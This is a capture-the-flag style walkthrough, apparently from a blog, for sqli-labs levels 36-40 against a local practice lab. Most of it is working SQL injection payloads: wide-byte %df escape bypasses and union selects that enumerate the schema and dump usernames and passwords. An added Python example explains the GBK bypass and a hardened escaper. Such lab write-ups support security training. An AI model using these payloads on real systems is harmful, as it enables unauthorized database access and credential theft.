sqli-labs Levels 36-40 Walkthrough
Date: 2024-08-27 20:21:29
Level 36
1. Determine the closing delimiter
http://127.0.0.1/Less-36/?id=1%df%20--+
2. Query the database name
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+
3. List the tables
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
4. List the columns
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+
5. Dump all data from the user table
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+
Level 37
1. Open Burp and capture the request
Send it to Repeater
2. Query the database name
uname=-1%df' union select database(),2#&passwd=1&submit=Submit
3. List the tables
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
4. List the columns
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
5. Dump all data from the user table
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
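Why the %df byte in the Level 36 and Level 37 payloads matters, shown as an added example that is not part of the original post: it assumes the lab escapes the parameter byte by byte while the database connection is read as GBK. The function names and the sample input are constructed for this illustration.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-level escaping (PHP addslashes() style): no charset awareness."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out.append(0x5C)  # prefix with a backslash byte
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that still terminate a string literal when the
    server reads `escaped` in `charset`."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # the backslash neutralises the next character
            continue
        count += text[i] == "'"
        i += 1
    return count


def escape_in_charset(raw: bytes, charset: str) -> bytes:
    """Hardened form: reject input that is malformed in the connection
    charset, then escape per character instead of per byte."""
    try:
        text = raw.decode(charset)  # strict decoding
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid " + charset) from exc
    escaped = "".join("\\" + ch if ch in "'\"\\" else ch for ch in text)
    return escaped.encode(charset)


# Constructed input: the URL-decoded bytes of the -1%df%27 prefix used above.
PROBE = b"-1\xdf'"

if __name__ == "__main__":
    weak = addslashes(PROBE)  # 0xDF 0x5C now forms one GBK character
    print(weak.hex(" "), "-> live quotes under gbk:", unescaped_quotes(weak, "gbk"))
    print("live quotes under latin-1:", unescaped_quotes(weak, "latin-1"))
    try:
        escape_in_charset(PROBE, "gbk")
    except ValueError as err:
        print("hardened escaper:", err)
```

In the PHP application itself the equivalent fix is a prepared statement, or setting the connection charset through the driver (for example mysqli_set_charset) so that the escaping function is charset-aware.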
Level 38
1. Determine the closing delimiter
http://172.16.1.41/Less-38/?id=1%27--+
2. Query the database name
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+
3. List the tables
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+
4. List the columns
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
5. Dump all data from the user table
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+
Level 39
1. Determine the closing delimiter
http://172.16.1.41/Less-39/?id=1--+
2. Query the database name
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--
3. List the tables
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+
4. List the columns
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
5. Dump all data from the user table
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
Level 40
1. Determine the closing delimiter
http://172.16.1.41/Less-40/?id=1%27)--+
2. Query the database name
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+
3. List the tables
http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
4. List the columns
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
5. Dump all data from the user table
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
From: https://blog.csdn.net/m0_75036923/article/details/141607427